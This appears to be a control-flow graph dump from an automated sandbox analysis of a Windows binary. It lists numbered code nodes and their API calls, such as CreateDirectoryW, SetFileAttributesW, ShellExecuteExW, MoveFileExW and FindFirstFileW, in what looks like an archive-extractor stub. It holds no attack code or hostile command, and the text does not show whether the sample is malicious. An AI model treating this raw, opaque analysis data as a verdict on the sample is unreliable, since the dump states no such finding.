                                                                                                                                  Signature Coverage:9.4%
                                                                                                                                  Total number of Nodes:1495
                                                                                                                                  Total number of Limit Nodes:45
24717->24718 25272 8a1fdc 24718->25272 24721 8bb0eb 24724 8a19af 128 API calls 24721->24724 24722 8bb0d9 24723 8a1692 86 API calls 24722->24723 24726 8bb0e4 24723->24726 24727 8bb10d __InternalCxxFrameHandler ___std_exception_copy 24724->24727 24725 8a1692 86 API calls 24725->24726 24726->24510 24726->24512 24727->24725 24728->24560 24730 8bb568 5 API calls 24729->24730 24731 8bd4e0 GetDlgItem 24730->24731 24732 8bd502 24731->24732 24733 8bd536 SendMessageW SendMessageW 24731->24733 24738 8bd50d ShowWindow SendMessageW SendMessageW 24732->24738 24734 8bd572 24733->24734 24735 8bd591 SendMessageW SendMessageW SendMessageW 24733->24735 24734->24735 24736 8bd5e7 SendMessageW 24735->24736 24737 8bd5c4 SendMessageW 24735->24737 24736->24511 24737->24736 24738->24733 24739->24571 24740->24599 24741->24604 24742->24609 24743->24615 24744->24479 24745->24549 24746->24570 24747->24541 24748->24531 24749->24629 24750->24627 24752 8aa2bf 24751->24752 24753 8aa2e3 24752->24753 24754 8aa2d6 CreateDirectoryW 24752->24754 24755 8aa231 3 API calls 24753->24755 24754->24753 24758 8aa316 24754->24758 24756 8aa2e9 24755->24756 24757 8aa329 GetLastError 24756->24757 24760 8abb03 GetCurrentDirectoryW 24756->24760 24759 8aa325 24757->24759 24758->24759 24764 8aa4ed 24758->24764 24759->24635 24762 8aa2ff 24760->24762 24762->24757 24763 8aa303 CreateDirectoryW 24762->24763 24763->24757 24763->24758 24765 8bec50 24764->24765 24766 8aa4fa SetFileAttributesW 24765->24766 24767 8aa53d 24766->24767 24768 8aa510 24766->24768 24767->24759 24769 8abb03 GetCurrentDirectoryW 24768->24769 24770 8aa524 24769->24770 24770->24767 24771 8aa528 SetFileAttributesW 24770->24771 24771->24767 24772->24665 24773->24665 24774->24675 24775->24665 24776->24665 24777->24665 24779 8b0666 _wcslen 24778->24779 24806 8a17e9 24779->24806 24781 8b067e 24781->24679 24783 8b0659 _wcslen 24782->24783 24784 8a17e9 78 API calls 24783->24784 24785 8b067e 24784->24785 24785->24681 24787 8a7b17 __EH_prolog 24786->24787 24823 
8ace40 24787->24823 24789 8a7b32 24790 8beb38 8 API calls 24789->24790 24791 8a7b5c 24790->24791 24829 8b4a76 24791->24829 24794 8a7c7d 24795 8a7c87 24794->24795 24797 8a7cf1 24795->24797 24858 8aa56d 24795->24858 24798 8a7d50 24797->24798 24836 8a8284 24797->24836 24800 8a7d92 24798->24800 24864 8a138b 74 API calls 24798->24864 24800->24685 24803 8a7bac 24802->24803 24805 8a7bb3 24802->24805 24804 8b2297 86 API calls 24803->24804 24804->24805 24807 8a17ff 24806->24807 24818 8a185a __InternalCxxFrameHandler 24806->24818 24808 8a1828 24807->24808 24819 8a6c36 76 API calls __vswprintf_c_l 24807->24819 24810 8a1887 24808->24810 24815 8a1847 ___std_exception_copy 24808->24815 24812 8c3e3e 22 API calls 24810->24812 24811 8a181e 24820 8a6ca7 75 API calls 24811->24820 24814 8a188e 24812->24814 24814->24818 24822 8a6ca7 75 API calls 24814->24822 24815->24818 24821 8a6ca7 75 API calls 24815->24821 24818->24781 24819->24811 24820->24808 24821->24818 24822->24818 24824 8ace4a __EH_prolog 24823->24824 24825 8beb38 8 API calls 24824->24825 24826 8ace8d 24825->24826 24827 8beb38 8 API calls 24826->24827 24828 8aceb1 24827->24828 24828->24789 24830 8b4a80 __EH_prolog 24829->24830 24831 8beb38 8 API calls 24830->24831 24832 8b4a9c 24831->24832 24833 8a7b8b 24832->24833 24835 8b0e46 80 API calls 24832->24835 24833->24794 24835->24833 24837 8a828e __EH_prolog 24836->24837 24865 8a13dc 24837->24865 24839 8a82aa 24840 8a82bb 24839->24840 25008 8a9f42 24839->25008 24843 8a82f2 24840->24843 24873 8a1a04 24840->24873 25004 8a1692 24843->25004 24849 8a83e8 24900 8a1f6d 24849->24900 24852 8a83f3 24852->24843 24904 8a3b2d 24852->24904 24916 8a848e 24852->24916 24854 8aa56d 7 API calls 24855 8a82ee 24854->24855 24855->24843 24855->24854 24857 8a8389 24855->24857 25012 8ac0c5 CompareStringW _wcslen 24855->25012 24892 8a8430 24857->24892 24859 8aa582 24858->24859 24860 8aa5b0 24859->24860 25256 8aa69b 24859->25256 24860->24795 24862 8aa592 24862->24860 24863 8aa597 FindClose 24862->24863 
24863->24860 24864->24800 24866 8a13e1 __EH_prolog 24865->24866 24867 8ace40 8 API calls 24866->24867 24868 8a1419 24867->24868 24869 8beb38 8 API calls 24868->24869 24872 8a1474 __cftof 24868->24872 24870 8a1461 24869->24870 24871 8ab505 84 API calls 24870->24871 24870->24872 24871->24872 24872->24839 24874 8a1a0e __EH_prolog 24873->24874 24886 8a1a61 24874->24886 24888 8a1b9b 24874->24888 25013 8a13ba 24874->25013 24876 8a1bc7 25016 8a138b 74 API calls 24876->25016 24879 8a3b2d 101 API calls 24882 8a1c12 24879->24882 24880 8a1bd4 24880->24879 24880->24888 24881 8a1c5a 24885 8a1c8d 24881->24885 24881->24888 25017 8a138b 74 API calls 24881->25017 24882->24881 24884 8a3b2d 101 API calls 24882->24884 24884->24882 24885->24888 24890 8a9e80 79 API calls 24885->24890 24886->24876 24886->24880 24886->24888 24887 8a3b2d 101 API calls 24889 8a1cde 24887->24889 24888->24855 24889->24887 24889->24888 24890->24889 24891 8a9e80 79 API calls 24891->24886 25035 8acf3d 24892->25035 24894 8a8440 25039 8b13d2 GetSystemTime SystemTimeToFileTime 24894->25039 24896 8a83a3 24896->24849 24897 8b1b66 24896->24897 25044 8bde6b 24897->25044 24901 8a1f72 __EH_prolog 24900->24901 24903 8a1fa6 24901->24903 25052 8a19af 24901->25052 24903->24852 24905 8a3b39 24904->24905 24906 8a3b3d 24904->24906 24905->24852 24915 8a9e80 79 API calls 24906->24915 24907 8a3b4f 24908 8a3b6a 24907->24908 24909 8a3b78 24907->24909 24910 8a3baa 24908->24910 25182 8a32f7 89 API calls 2 library calls 24908->25182 25183 8a286b 101 API calls 3 library calls 24909->25183 24910->24852 24913 8a3b76 24913->24910 25184 8a20d7 74 API calls 24913->25184 24915->24907 24917 8a8498 __EH_prolog 24916->24917 24920 8a84d5 24917->24920 24927 8a8513 24917->24927 25209 8b8c8d 103 API calls 24917->25209 24919 8a84f5 24921 8a84fa 24919->24921 24922 8a851c 24919->24922 24920->24919 24924 8a857a 24920->24924 24920->24927 24921->24927 25210 8a7a0d 152 API calls 24921->25210 24922->24927 25211 8b8c8d 103 API calls 24922->25211 24924->24927 
25185 8a5d1a 24924->25185 24927->24852 24928 8a8605 24928->24927 25191 8a8167 24928->25191 24931 8a8797 24932 8aa56d 7 API calls 24931->24932 24934 8a8802 24931->24934 24932->24934 24933 8ad051 82 API calls 24941 8a885d 24933->24941 25197 8a7c0d 24934->25197 24936 8a898b 25214 8a2021 74 API calls 24936->25214 24937 8a8a5f 24942 8a8ab6 24937->24942 24954 8a8a6a 24937->24954 24938 8a8992 24938->24937 24943 8a89e1 24938->24943 24941->24927 24941->24933 24941->24936 24941->24938 25212 8a8117 84 API calls 24941->25212 25213 8a2021 74 API calls 24941->25213 24949 8a8a4c 24942->24949 25217 8a7fc0 97 API calls 24942->25217 24946 8aa231 3 API calls 24943->24946 24943->24949 24951 8a8b14 24943->24951 24944 8a8ab4 24945 8a959a 80 API calls 24944->24945 24945->24927 24950 8a8a19 24946->24950 24948 8a959a 80 API calls 24948->24927 24949->24944 24949->24951 24950->24949 25215 8a92a3 97 API calls 24950->25215 24963 8a8b82 24951->24963 24993 8a9105 24951->24993 25218 8a98bc 24951->25218 24952 8aab1a 8 API calls 24955 8a8bd1 24952->24955 24954->24944 25216 8a7db2 101 API calls 24954->25216 24958 8aab1a 8 API calls 24955->24958 24967 8a8be7 24958->24967 24961 8a8b70 25222 8a6e98 77 API calls 24961->25222 24963->24952 24964 8a8cbc 24965 8a8d18 24964->24965 24966 8a8e40 24964->24966 24968 8a8d8a 24965->24968 24969 8a8d28 24965->24969 24970 8a8e52 24966->24970 24971 8a8e66 24966->24971 24989 8a8d49 24966->24989 24967->24964 24976 8a8c93 24967->24976 24983 8a981a 79 API calls 24967->24983 24977 8a8167 19 API calls 24968->24977 24973 8a8d6e 24969->24973 24981 8a8d37 24969->24981 24974 8a9215 123 API calls 24970->24974 24972 8b3377 75 API calls 24971->24972 24975 8a8e7f 24972->24975 24973->24989 25225 8a77b8 111 API calls 24973->25225 24974->24989 25228 8b3020 123 API calls 24975->25228 24976->24964 25223 8a9a3c 82 API calls 24976->25223 24980 8a8dbd 24977->24980 24985 8a8de6 24980->24985 24986 8a8df5 24980->24986 24980->24989 25224 8a2021 74 API calls 24981->25224 24983->24976 25226 
8a7542 85 API calls 24985->25226 25227 8a9155 93 API calls __EH_prolog 24986->25227 24992 8a8f85 24989->24992 25229 8a2021 74 API calls 24989->25229 24991 8a9090 24991->24993 24995 8aa4ed 3 API calls 24991->24995 24992->24991 24992->24993 24994 8a903e 24992->24994 25203 8a9f09 SetEndOfFile 24992->25203 24993->24948 25204 8a9da2 24994->25204 24996 8a90eb 24995->24996 24996->24993 25230 8a2021 74 API calls 24996->25230 24999 8a9085 25001 8a9620 77 API calls 24999->25001 25001->24991 25002 8a90fb 25231 8a6dcb 76 API calls 25002->25231 25005 8a16a4 25004->25005 25247 8acee1 25005->25247 25009 8a9f59 25008->25009 25010 8a9f63 25009->25010 25255 8a6d0c 78 API calls 25009->25255 25010->24840 25012->24855 25018 8a1732 25013->25018 25015 8a13d6 25015->24891 25016->24888 25017->24885 25019 8a1748 25018->25019 25030 8a17a0 __InternalCxxFrameHandler 25018->25030 25020 8a1771 25019->25020 25031 8a6c36 76 API calls __vswprintf_c_l 25019->25031 25022 8a17c7 25020->25022 25027 8a178d ___std_exception_copy 25020->25027 25024 8c3e3e 22 API calls 25022->25024 25023 8a1767 25032 8a6ca7 75 API calls 25023->25032 25026 8a17ce 25024->25026 25026->25030 25034 8a6ca7 75 API calls 25026->25034 25027->25030 25033 8a6ca7 75 API calls 25027->25033 25030->25015 25031->25023 25032->25020 25033->25030 25034->25030 25036 8acf4d 25035->25036 25038 8acf54 25035->25038 25040 8a981a 25036->25040 25038->24894 25039->24896 25041 8a9833 25040->25041 25043 8a9e80 79 API calls 25041->25043 25042 8a9865 25042->25038 25043->25042 25045 8bde78 25044->25045 25046 8ae617 53 API calls 25045->25046 25047 8bde9b 25046->25047 25048 8a4092 _swprintf 51 API calls 25047->25048 25049 8bdead 25048->25049 25050 8bd4d4 16 API calls 25049->25050 25051 8b1b7c 25050->25051 25051->24849 25053 8a19bf 25052->25053 25055 8a19bb 25052->25055 25056 8a18f6 25053->25056 25055->24903 25057 8a1908 25056->25057 25058 8a1945 25056->25058 25059 8a3b2d 101 API calls 25057->25059 25064 8a3fa3 25058->25064 25062 8a1928 25059->25062 
25062->25055 25068 8a3fac 25064->25068 25065 8a3b2d 101 API calls 25065->25068 25066 8a1966 25066->25062 25069 8a1e50 25066->25069 25068->25065 25068->25066 25081 8b0e08 25068->25081 25070 8a1e5a __EH_prolog 25069->25070 25089 8a3bba 25070->25089 25072 8a1e84 25073 8a1732 78 API calls 25072->25073 25076 8a1f0b 25072->25076 25074 8a1e9b 25073->25074 25117 8a18a9 78 API calls 25074->25117 25076->25062 25077 8a1eb3 25079 8a1ebf _wcslen 25077->25079 25118 8b1b84 MultiByteToWideChar 25077->25118 25119 8a18a9 78 API calls 25079->25119 25082 8b0e0f 25081->25082 25083 8b0e2a 25082->25083 25087 8a6c31 RaiseException CallUnexpected 25082->25087 25085 8b0e3b SetThreadExecutionState 25083->25085 25088 8a6c31 RaiseException CallUnexpected 25083->25088 25085->25068 25087->25083 25088->25085 25090 8a3bc4 __EH_prolog 25089->25090 25091 8a3bda 25090->25091 25092 8a3bf6 25090->25092 25145 8a138b 74 API calls 25091->25145 25094 8a3e51 25092->25094 25097 8a3c22 25092->25097 25162 8a138b 74 API calls 25094->25162 25096 8a3be5 25096->25072 25097->25096 25120 8b3377 25097->25120 25099 8a3ca3 25101 8a3d2e 25099->25101 25116 8a3c9a 25099->25116 25148 8ad051 25099->25148 25100 8a3c9f 25100->25099 25147 8a20bd 78 API calls 25100->25147 25130 8aab1a 25101->25130 25103 8a3c8f 25146 8a138b 74 API calls 25103->25146 25104 8a3c71 25104->25099 25104->25100 25104->25103 25106 8a3d41 25110 8a3dd7 25106->25110 25111 8a3dc7 25106->25111 25154 8b3020 123 API calls 25110->25154 25134 8a9215 25111->25134 25114 8a3dd5 25114->25116 25155 8a2021 74 API calls 25114->25155 25156 8b2297 25116->25156 25117->25077 25118->25079 25119->25076 25121 8b338c 25120->25121 25123 8b3396 ___std_exception_copy 25120->25123 25163 8a6ca7 75 API calls 25121->25163 25124 8b34c6 25123->25124 25125 8b341c 25123->25125 25129 8b3440 __cftof 25123->25129 25165 8c238d RaiseException 25124->25165 25164 8b32aa 75 API calls 3 library calls 25125->25164 25128 8b34f2 25129->25104 25131 8aab28 25130->25131 25133 8aab32 25130->25133 25132 
8beb38 8 API calls 25131->25132 25132->25133 25133->25106 25135 8a921f __EH_prolog 25134->25135 25166 8a7c64 25135->25166 25138 8a13ba 78 API calls 25139 8a9231 25138->25139 25169 8ad114 25139->25169 25141 8a9243 25142 8a928a 25141->25142 25144 8ad114 118 API calls 25141->25144 25178 8ad300 97 API calls __InternalCxxFrameHandler 25141->25178 25142->25114 25144->25141 25145->25096 25146->25116 25147->25099 25149 8ad072 25148->25149 25150 8ad084 25148->25150 25179 8a603a 82 API calls 25149->25179 25180 8a603a 82 API calls 25150->25180 25153 8ad07c 25153->25101 25154->25114 25155->25116 25157 8b22a1 25156->25157 25158 8b22ba 25157->25158 25161 8b22ce 25157->25161 25181 8b0eed 86 API calls 25158->25181 25160 8b22c1 25160->25161 25162->25096 25163->25123 25164->25129 25165->25128 25167 8ab146 GetVersionExW 25166->25167 25168 8a7c69 25167->25168 25168->25138 25175 8ad12a __InternalCxxFrameHandler 25169->25175 25170 8ad29a 25171 8ad0cb 6 API calls 25170->25171 25173 8ad2ce 25170->25173 25171->25173 25172 8b0e08 SetThreadExecutionState RaiseException 25176 8ad291 25172->25176 25173->25172 25174 8b8c8d 103 API calls 25174->25175 25175->25170 25175->25174 25175->25176 25177 8aac05 91 API calls 25175->25177 25176->25141 25177->25175 25178->25141 25179->25153 25180->25153 25181->25160 25182->24913 25183->24913 25184->24910 25186 8a5d2a 25185->25186 25232 8a5c4b 25186->25232 25189 8a5d5d 25190 8a5d95 25189->25190 25237 8ab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25189->25237 25190->24928 25192 8a8186 25191->25192 25193 8a8232 25192->25193 25244 8abe5e 19 API calls __InternalCxxFrameHandler 25192->25244 25243 8b1fac CharUpperW 25193->25243 25196 8a823b 25196->24931 25198 8a7c22 25197->25198 25199 8a7c5a 25198->25199 25245 8a6e7a 74 API calls 25198->25245 25199->24941 25201 8a7c52 25246 8a138b 74 API calls 25201->25246 25203->24994 25205 8a9db3 25204->25205 25208 8a9dc2 25204->25208 25206 8a9db9 FlushFileBuffers 25205->25206 25205->25208 
25206->25208 25207 8a9e3f SetFileTime 25207->24999 25208->25207 25209->24920 25210->24927 25211->24927 25212->24941 25213->24941 25214->24938 25215->24949 25216->24944 25217->24949 25219 8a8b5a 25218->25219 25220 8a98c5 GetFileType 25218->25220 25219->24963 25221 8a2021 74 API calls 25219->25221 25220->25219 25221->24961 25222->24963 25223->24964 25224->24989 25225->24989 25226->24989 25227->24989 25228->24989 25229->24992 25230->25002 25231->24993 25238 8a5b48 25232->25238 25234 8a5c6c 25234->25189 25236 8a5b48 2 API calls 25236->25234 25237->25189 25239 8a5b52 25238->25239 25240 8a5c3a 25239->25240 25242 8ab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25239->25242 25240->25234 25240->25236 25242->25239 25243->25196 25244->25193 25245->25201 25246->25199 25249 8acef2 25247->25249 25253 8aa99e 86 API calls 25249->25253 25250 8acf24 25254 8aa99e 86 API calls 25250->25254 25252 8acf2f 25253->25250 25254->25252 25255->25010 25257 8aa6a8 25256->25257 25258 8aa6c1 FindFirstFileW 25257->25258 25259 8aa727 FindNextFileW 25257->25259 25261 8aa6d0 25258->25261 25266 8aa709 25258->25266 25260 8aa732 GetLastError 25259->25260 25259->25266 25260->25266 25262 8abb03 GetCurrentDirectoryW 25261->25262 25263 8aa6e0 25262->25263 25264 8aa6fe GetLastError 25263->25264 25265 8aa6e4 FindFirstFileW 25263->25265 25264->25266 25265->25264 25265->25266 25266->24862 25267->24699 25268->24702 25269->24702 25270->24705 25271->24713 25273 8a9f42 78 API calls 25272->25273 25274 8a1fe8 25273->25274 25275 8a1a04 101 API calls 25274->25275 25278 8a2005 25274->25278 25276 8a1ff5 25275->25276 25276->25278 25279 8a138b 74 API calls 25276->25279 25278->24721 25278->24722 25279->25278 25280 8a13e1 84 API calls 2 library calls 25352 8b94e0 GetClientRect 25387 8b21e0 26 API calls std::bad_exception::bad_exception 25409 8bf2e0 46 API calls __RTC_Initialize 25281 8beae7 25282 8beaf1 25281->25282 25283 8be85d ___delayLoadHelper2@8 14 API calls 25282->25283 25284 8beafe 
25283->25284 25353 8bf4e7 29 API calls _abort 25410 8cbee0 GetCommandLineA GetCommandLineW 25354 8c2cfb 38 API calls 4 library calls 25388 8a95f0 80 API calls 25389 8bfd4f 9 API calls 2 library calls 25411 8a5ef0 82 API calls 25301 8c98f0 25309 8cadaf 25301->25309 25304 8c9904 25306 8c990c 25307 8c9919 25306->25307 25317 8c9920 11 API calls 25306->25317 25310 8cac98 _abort 5 API calls 25309->25310 25311 8cadd6 25310->25311 25312 8cadee TlsAlloc 25311->25312 25313 8caddf 25311->25313 25312->25313 25314 8bfbbc _ValidateLocalCookies 5 API calls 25313->25314 25315 8c98fa 25314->25315 25315->25304 25316 8c9869 20 API calls 2 library calls 25315->25316 25316->25306 25317->25304 25318 8cabf0 25319 8cabfb 25318->25319 25321 8cac24 25319->25321 25323 8cac20 25319->25323 25324 8caf0a 25319->25324 25331 8cac50 DeleteCriticalSection 25321->25331 25325 8cac98 _abort 5 API calls 25324->25325 25326 8caf31 25325->25326 25327 8caf4f InitializeCriticalSectionAndSpinCount 25326->25327 25330 8caf3a 25326->25330 25327->25330 25328 8bfbbc _ValidateLocalCookies 5 API calls 25329 8caf66 25328->25329 25329->25319 25330->25328 25331->25323 25355 8c88f0 7 API calls ___scrt_uninitialize_crt 25357 8ba400 GdipDisposeImage GdipFree 25412 8bd600 70 API calls 25358 8c6000 QueryPerformanceFrequency QueryPerformanceCounter 25392 8c2900 6 API calls 4 library calls 25413 8cf200 51 API calls 25430 8ca700 21 API calls 25432 8a1710 86 API calls 25395 8bad10 73 API calls 25414 8bc220 93 API calls _swprintf 25364 8cf421 21 API calls __vswprintf_c_l 25397 8cb4ae 27 API calls _ValidateLocalCookies 25365 8a1025 29 API calls 25398 8bf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25435 8bff30 LocalFree 25367 8cc030 GetProcessHeap 25368 8ba440 GdipCloneImage GdipAlloc 25415 8c3a40 5 API calls _ValidateLocalCookies 25437 8d1f40 CloseHandle 24164 8bcd58 24166 8bce22 24164->24166 24171 8bcd7b 24164->24171 24177 8bc793 _wcslen _wcsrchr 24166->24177 
24192 8bd78f 24166->24192 24168 8bd40a 24170 8b1fbb CompareStringW 24170->24171 24171->24166 24171->24170 24172 8bca67 SetWindowTextW 24172->24177 24177->24168 24177->24172 24178 8bc855 SetFileAttributesW 24177->24178 24184 8bcc31 GetDlgItem SetWindowTextW SendMessageW 24177->24184 24187 8bcc71 SendMessageW 24177->24187 24191 8b1fbb CompareStringW 24177->24191 24216 8bb314 24177->24216 24220 8ba64d GetCurrentDirectoryW 24177->24220 24222 8aa5d1 6 API calls 24177->24222 24223 8aa55a FindClose 24177->24223 24224 8bb48e 76 API calls 2 library calls 24177->24224 24225 8c3e3e 24177->24225 24180 8bc90f GetFileAttributesW 24178->24180 24181 8bc86f __cftof _wcslen 24178->24181 24180->24177 24183 8bc921 DeleteFileW 24180->24183 24181->24177 24181->24180 24221 8ab991 51 API calls 2 library calls 24181->24221 24183->24177 24185 8bc932 24183->24185 24184->24177 24186 8a4092 _swprintf 51 API calls 24185->24186 24188 8bc952 GetFileAttributesW 24186->24188 24187->24177 24188->24185 24189 8bc967 MoveFileW 24188->24189 24189->24177 24190 8bc97f MoveFileExW 24189->24190 24190->24177 24191->24177 24194 8bd799 __cftof _wcslen 24192->24194 24193 8bd9e7 24193->24177 24194->24193 24195 8bd8a5 24194->24195 24196 8bd9c0 24194->24196 24241 8b1fbb CompareStringW 24194->24241 24238 8aa231 24195->24238 24196->24193 24200 8bd9de ShowWindow 24196->24200 24200->24193 24201 8bd8d9 ShellExecuteExW 24201->24193 24206 8bd8ec 24201->24206 24203 8bd8d1 24203->24201 24204 8bd925 24243 8bdc3b 6 API calls 24204->24243 24205 8bd97b CloseHandle 24207 8bd989 24205->24207 24208 8bd994 24205->24208 24206->24204 24206->24205 24209 8bd91b ShowWindow 24206->24209 24244 8b1fbb CompareStringW 24207->24244 24208->24196 24209->24204 24212 8bd93d 24212->24205 24213 8bd950 GetExitCodeProcess 24212->24213 24213->24205 24214 8bd963 24213->24214 24214->24205 24217 8bb31e 24216->24217 24218 8bb3f0 ExpandEnvironmentStringsW 24217->24218 24219 8bb40d 24217->24219 24218->24219 24219->24177 24220->24177 24221->24181 
24222->24177 24223->24177 24224->24177 24226 8c8e54 24225->24226 24227 8c8e6c 24226->24227 24228 8c8e61 24226->24228 24229 8c8e74 24227->24229 24236 8c8e7d _abort 24227->24236 24253 8c8e06 24228->24253 24231 8c8dcc _free 20 API calls 24229->24231 24234 8c8e69 24231->24234 24232 8c8ea7 HeapReAlloc 24232->24234 24232->24236 24233 8c8e82 24260 8c91a8 20 API calls __dosmaperr 24233->24260 24234->24177 24236->24232 24236->24233 24261 8c7a5e 7 API calls 2 library calls 24236->24261 24245 8aa243 24238->24245 24241->24195 24242 8ab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24242->24203 24243->24212 24244->24208 24246 8bec50 24245->24246 24247 8aa250 GetFileAttributesW 24246->24247 24248 8aa23a 24247->24248 24249 8aa261 24247->24249 24248->24201 24248->24242 24250 8abb03 GetCurrentDirectoryW 24249->24250 24251 8aa275 24250->24251 24251->24248 24252 8aa279 GetFileAttributesW 24251->24252 24252->24248 24254 8c8e44 24253->24254 24258 8c8e14 _abort 24253->24258 24263 8c91a8 20 API calls __dosmaperr 24254->24263 24256 8c8e2f RtlAllocateHeap 24257 8c8e42 24256->24257 24256->24258 24257->24234 24258->24254 24258->24256 24262 8c7a5e 7 API calls 2 library calls 24258->24262 24260->24234 24261->24236 24262->24258 24263->24257 25371 8be455 14 API calls ___delayLoadHelper2@8 25372 8bc793 107 API calls 4 library calls 25438 8c7f6e 52 API calls 3 library calls 24304 8c8268 24315 8cbb30 24304->24315 24310 8c8dcc _free 20 API calls 24311 8c82ba 24310->24311 24312 8c8290 24313 8c8dcc _free 20 API calls 24312->24313 24314 8c8285 24313->24314 24314->24310 24316 8cbb39 24315->24316 24317 8c827a 24315->24317 24332 8cba27 24316->24332 24319 8cbf30 GetEnvironmentStringsW 24317->24319 24320 8cbf47 24319->24320 24330 8cbf9a 24319->24330 24323 8cbf4d WideCharToMultiByte 24320->24323 24321 8c827f 24321->24314 24331 8c82c0 26 API calls 4 library calls 24321->24331 24322 8cbfa3 FreeEnvironmentStringsW 24322->24321 24324 8cbf69 24323->24324 24323->24330 24325 8c8e06 __vswprintf_c_l 21 
API calls 24324->24325 24326 8cbf6f 24325->24326 24327 8cbf76 WideCharToMultiByte 24326->24327 24328 8cbf8c 24326->24328 24327->24328 24329 8c8dcc _free 20 API calls 24328->24329 24329->24330 24330->24321 24330->24322 24331->24312 24333 8c97e5 _abort 38 API calls 24332->24333 24334 8cba34 24333->24334 24352 8cbb4e 24334->24352 24336 8cba3c 24361 8cb7bb 24336->24361 24339 8cba53 24339->24317 24340 8c8e06 __vswprintf_c_l 21 API calls 24341 8cba64 24340->24341 24347 8cba96 24341->24347 24368 8cbbf0 24341->24368 24344 8c8dcc _free 20 API calls 24344->24339 24345 8cba91 24378 8c91a8 20 API calls __dosmaperr 24345->24378 24347->24344 24348 8cbaae 24349 8cbada 24348->24349 24350 8c8dcc _free 20 API calls 24348->24350 24349->24347 24379 8cb691 26 API calls 24349->24379 24350->24349 24353 8cbb5a __FrameHandler3::FrameUnwindToState 24352->24353 24354 8c97e5 _abort 38 API calls 24353->24354 24359 8cbb64 24354->24359 24356 8cbbe8 _abort 24356->24336 24359->24356 24360 8c8dcc _free 20 API calls 24359->24360 24380 8c8d24 38 API calls _abort 24359->24380 24381 8cac31 EnterCriticalSection 24359->24381 24382 8cbbdf LeaveCriticalSection _abort 24359->24382 24360->24359 24362 8c4636 __cftof 38 API calls 24361->24362 24363 8cb7cd 24362->24363 24364 8cb7dc GetOEMCP 24363->24364 24365 8cb7ee 24363->24365 24367 8cb805 24364->24367 24366 8cb7f3 GetACP 24365->24366 24365->24367 24366->24367 24367->24339 24367->24340 24369 8cb7bb 40 API calls 24368->24369 24370 8cbc0f 24369->24370 24372 8cbc60 IsValidCodePage 24370->24372 24375 8cbc16 24370->24375 24377 8cbc85 __cftof 24370->24377 24371 8bfbbc _ValidateLocalCookies 5 API calls 24373 8cba89 24371->24373 24374 8cbc72 GetCPInfo 24372->24374 24372->24375 24373->24345 24373->24348 24374->24375 24374->24377 24375->24371 24383 8cb893 GetCPInfo 24377->24383 24378->24347 24379->24347 24381->24359 24382->24359 24387 8cb8cd 24383->24387 24392 8cb977 24383->24392 24386 8bfbbc _ValidateLocalCookies 5 API calls 24389 8cba23 24386->24389 24393 8cc988 
24387->24393 24389->24375 24391 8cab78 __vswprintf_c_l 43 API calls 24391->24392 24392->24386 24394 8c4636 __cftof 38 API calls 24393->24394 24395 8cc9a8 MultiByteToWideChar 24394->24395 24397 8cc9e6 24395->24397 24404 8cca7e 24395->24404 24399 8c8e06 __vswprintf_c_l 21 API calls 24397->24399 24405 8cca07 __cftof __vsnwprintf_l 24397->24405 24398 8bfbbc _ValidateLocalCookies 5 API calls 24400 8cb92e 24398->24400 24399->24405 24407 8cab78 24400->24407 24401 8cca78 24412 8cabc3 20 API calls _free 24401->24412 24403 8cca4c MultiByteToWideChar 24403->24401 24406 8cca68 GetStringTypeW 24403->24406 24404->24398 24405->24401 24405->24403 24406->24401 24408 8c4636 __cftof 38 API calls 24407->24408 24409 8cab8b 24408->24409 24413 8ca95b 24409->24413 24412->24404 24414 8ca976 __vswprintf_c_l 24413->24414 24415 8ca99c MultiByteToWideChar 24414->24415 24416 8ca9c6 24415->24416 24427 8cab50 24415->24427 24421 8c8e06 __vswprintf_c_l 21 API calls 24416->24421 24423 8ca9e7 __vsnwprintf_l 24416->24423 24417 8bfbbc _ValidateLocalCookies 5 API calls 24418 8cab63 24417->24418 24418->24391 24419 8caa9c 24449 8cabc3 20 API calls _free 24419->24449 24420 8caa30 MultiByteToWideChar 24420->24419 24422 8caa49 24420->24422 24421->24423 24440 8caf6c 24422->24440 24423->24419 24423->24420 24427->24417 24428 8caaab 24430 8c8e06 __vswprintf_c_l 21 API calls 24428->24430 24434 8caacc __vsnwprintf_l 24428->24434 24429 8caa73 24429->24419 24431 8caf6c __vswprintf_c_l 11 API calls 24429->24431 24430->24434 24431->24419 24432 8cab41 24448 8cabc3 20 API calls _free 24432->24448 24434->24432 24435 8caf6c __vswprintf_c_l 11 API calls 24434->24435 24436 8cab20 24435->24436 24436->24432 24437 8cab2f WideCharToMultiByte 24436->24437 24437->24432 24438 8cab6f 24437->24438 24450 8cabc3 20 API calls _free 24438->24450 24441 8cac98 _abort 5 API calls 24440->24441 24442 8caf93 24441->24442 24445 8caf9c 24442->24445 24451 8caff4 10 API calls 3 library calls 24442->24451 24444 8cafdc LCMapStringW 24444->24445 
24446 8bfbbc _ValidateLocalCookies 5 API calls 24445->24446 24447 8caa60 24446->24447 24447->24419 24447->24428 24447->24429 24448->24419 24449->24427 24450->24419 24451->24444 25286 8a9f7a 25287 8a9f88 25286->25287 25288 8a9f8f 25286->25288 25289 8a9f9c GetStdHandle 25288->25289 25296 8a9fab 25288->25296 25289->25296 25290 8aa003 WriteFile 25290->25296 25291 8a9fcf 25292 8a9fd4 WriteFile 25291->25292 25291->25296 25292->25291 25292->25296 25294 8aa095 25298 8a6e98 77 API calls 25294->25298 25296->25287 25296->25290 25296->25291 25296->25292 25296->25294 25297 8a6baa 78 API calls 25296->25297 25297->25296 25298->25287 25439 8a1f72 128 API calls __EH_prolog 25374 8ba070 10 API calls 25417 8bb270 99 API calls 25333 8a9a74 25337 8a9a7e 25333->25337 25334 8a9ab1 25335 8a9b9d SetFilePointer 25335->25334 25336 8a9bb6 GetLastError 25335->25336 25336->25334 25337->25334 25337->25335 25338 8a981a 79 API calls 25337->25338 25339 8a9b79 25337->25339 25338->25339 25339->25335 25376 8a1075 84 API calls

Control-flow Graph

APIs
  • Part of subcall function 008B0863: GetModuleHandleW.KERNEL32(kernel32), ref: 008B087C
  • Part of subcall function 008B0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008B088E
  • Part of subcall function 008B0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008B08BF
  • Part of subcall function 008BA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 008BA655
